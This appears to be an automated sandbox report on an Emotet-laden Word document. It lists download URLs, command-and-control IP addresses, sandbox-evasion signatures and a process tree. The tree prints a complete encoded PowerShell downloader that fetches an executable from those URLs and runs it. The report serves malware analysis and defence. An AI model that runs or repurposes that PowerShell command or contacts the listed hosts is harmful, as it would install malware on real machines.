Analysis
-
max time kernel
25s -
resource
win10v191014 -
submitted
10-12-2019 01:07
General
Malware Config
Extracted
https://profileonline360.com/Search-Replace-DB-master/cxesii/
http://richardciccarone.com/watixl/KbSXxlb/
http://aminulnakla.com/test/ERmpCOhO/
http://abanti.mygifts.xyz/resources/u4et7xi3r-n6a4-65/
http://38seventeen.com/wp-content/eSKnzZS/
Extracted
emotet
24.27.122.202:80
67.171.182.231:80
190.171.135.235:80
103.9.145.19:8080
46.105.128.215:8080
172.105.213.30:80
69.30.205.162:7080
115.179.91.58:80
181.44.166.242:80
78.46.87.133:8080
81.213.145.45:443
83.156.88.159:80
210.111.160.220:80
195.191.107.67:80
192.241.220.183:8080
1.32.54.12:8080
192.161.190.171:8080
190.189.79.73:80
122.11.164.183:80
41.77.74.214:443
212.129.14.27:8080
162.144.46.90:8080
142.93.87.198:8080
201.196.15.79:990
83.110.107.243:443
77.245.12.212:80
211.218.105.101:80
187.250.92.82:80
193.33.38.208:443
85.109.190.235:443
192.210.217.94:8080
200.71.112.158:53
190.161.67.63:80
186.66.224.182:990
152.169.32.143:8080
41.218.118.66:80
45.129.121.222:443
72.69.99.47:80
85.105.183.228:443
191.100.24.201:50000
23.253.207.142:8080
216.75.37.196:8080
95.216.212.157:8080
113.52.135.33:7080
212.112.113.235:80
190.5.162.204:80
83.99.211.160:80
86.6.123.109:80
110.142.161.90:80
172.90.70.168:443
89.215.225.15:80
98.15.140.226:80
5.189.148.98:8080
187.233.220.93:443
188.230.134.205:80
181.47.235.26:993
82.79.244.92:80
189.61.200.9:443
221.154.59.110:80
67.254.196.78:443
210.224.65.117:80
198.57.217.170:8080
201.183.251.100:80
177.103.201.23:80
46.105.131.68:8080
192.163.221.191:8080
46.17.6.116:8080
81.82.247.216:80
178.134.1.238:80
176.58.93.123:80
181.197.108.171:443
187.177.155.123:990
190.101.87.170:80
186.215.101.106:80
119.159.150.176:443
174.57.150.13:8080
58.93.151.148:80
37.59.24.25:8080
91.117.31.181:80
95.216.207.86:7080
123.142.37.165:80
182.176.116.139:995
103.122.75.218:80
78.186.102.195:80
124.150.175.129:8080
143.95.101.72:8080
51.38.134.203:8080
138.197.140.163:8080
172.104.70.207:8080
189.225.211.171:443
124.150.175.133:80
24.28.178.71:80
60.53.3.153:8080
72.27.212.209:8080
163.172.97.112:8080
50.116.78.109:8080
Signatures
-
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4980 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4980 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 1748 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 1748 Powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
228.exe228.exepid process 4380 228.exe 3752 228.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
228.exepid process 3752 228.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE228.exe228.exepid process 4980 WINWORD.EXE 4380 228.exe 3752 228.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
SppExtComObj.exePowershell.exe228.exedescription pid process target process PID 4408 wrote to memory of 4004 4408 SppExtComObj.exe SLUI.exe PID 1748 wrote to memory of 4380 1748 Powershell.exe 228.exe PID 4380 wrote to memory of 3752 4380 228.exe 228.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\33bf31ffc5b3c56199e0b5b8c952aeab2fb5319a73bdfcfc8ed0d5e0295b3c4a.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABPAGsAegBxAGIAeABoAGIAZAB2AD0AJwBCAG8AbgB4AGUAdgBrAHQAawB6AGEAagAnADsAJABPAGEAbQBtAGcAZQBxAGIAdgBoACAAPQAgACcAMgAyADgAJwA7ACQAUgB6AGIAbgB4AHIAbwB1AGcAZABxAD0AJwBMAHUAaAB0AGYAdQBrAHMAcgB0AHgAJwA7ACQAWgB5AGkAcQBjAGgAcwBtAHMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE8AYQBtAG0AZwBlAHEAYgB2AGgAKwAnAC4AZQB4AGUAJwA7ACQATgB6AHAAawBwAGwAcgBoAHEAYgBjAGkAeQA9ACcAVABoAHQAbgBkAHYAaABwAHMAZwBkACcAOwAkAEUAaQBxAG0AagBlAHQAcQB4AGEAagA9ACYAKAAnAG4AZQB3AC0AbwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAATgBlAHQALgBXAEUAQgBjAGwAaQBFAG4AVAA7ACQAVQBkAHIAZgBlAGEAcgBhAHgAZQBhAGwAbgA9ACcAaAB0AHQAcABzADoALwAvAHAAcgBvAGYAaQBsAGUAbwBuAGwAaQBuAGUAMwA2ADAALgBjAG8AbQAvAFMAZQBhAHIAYwBoAC0AUgBlAHAAbABhAGMAZQAtAEQAQgAtAG0AYQBzAHQAZQByAC8AYwB4AGUAcwBpAGkALwAqAGgAdAB0AHAAOgAvAC8AcgBpAGMAaABhAHIAZABjAGkAYwBjAGEAcgBvAG4AZQAuAGMAbwBtAC8AdwBhAHQAaQB4AGwALwBLAGIAUwBYAHgAbABiAC8AKgBoAHQAdABwADoALwAvAGEAbQBpAG4AdQBsAG4AYQBrAGwAYQAuAGMAbwBtAC8AdABlAHMAdAAvAEUAUgBtAHAAQwBPAGgATwAvACoAaAB0AHQAcAA6AC8ALwBhAGIAYQBuAHQAaQAuAG0AeQBnAGkAZgB0AHMALgB4AHkAegAvAHIAZQBzAG8AdQByAGMAZQBzAC8AdQA0AGUAdAA3AHgAaQAzAHIALQBuADYAYQA0AC0ANgA1AC8AKgBoAHQAdABwADoALwAvADMAOABzAGUAdgBlAG4AdABlAGUAbgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGUAUwBLAG4AegBaAFMALwAnAC4AIgBzAFAAYABsAEkAVAAiACgAJwAqACcAKQA7ACQAWAB6AGcAZQBtAGEAZQBwAGYAdgBvAGYAegA9ACcAVABlAGwAaAB1AHgAeQBrAHoAagB3AGIAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEcAagBwAGsAcwB3AHcAdgBxAGMAIABpAG4AIAAkAFUAZAByAGYAZQBhAHIAYQB4AGUAYQBsAG4AKQB7AHQAcgB5AHsAJABFAGkAcQBtAGoAZQB0AHEAeABhAGoALgAiAGQAbwB3AG4AYABMAG8AYQBgAEQAYABGAGkAbABFACIAKAAkAEcAagBwAGsAcwB3AHcAdgBxAGMALAAgACQAWgB5AGkAcQBjAGgAcwBtAHMAKQA7ACQAWABkAGwAYQBzAGoAcQB1AHgAdgA9ACcAWABvAGwAZgBpAGUAbgBtAHcAbgB2AHcAcQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFoAeQBpAHEAYwBoAHMAbQBzACkALgAiAEwAZQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMgAwADgANAA2ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABhAGAAUgB0ACIAKAAkAFoAeQBpAHEAYwBoAHMAbQBzACkAOwAkAEgAdgBwAHkAeABnAGkAcwBjAGYAZwA9ACcAWQBnAHAAagB5AGEAagB6ACcAOwBiAHIAZQBhAGsAOwAkAFMAbgB0AG0AawBpAHAAagA9ACcAQgBuAGMAZgB5AHkAcQBnAHQAZAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABQAGkAeQBnAGYAbQByAGEAcQBxAG0AdQB4AD0AJwBUAHkAawBtAHYAbwBvAGMAawAnAA==1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\228.exe"C:\Users\Admin\228.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\228.exe--1077e7163⤵
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\228.exe
-
C:\Users\Admin\228.exe
-
C:\Users\Admin\228.exe
-
memory/3752-12-0x0000000002040000-0x0000000002057000-memory.dmpFilesize
92KB
-
memory/3752-13-0x0000000000400000-0x0000000000458000-memory.dmpFilesize
352KB
-
memory/4380-10-0x0000000000620000-0x0000000000637000-memory.dmpFilesize
92KB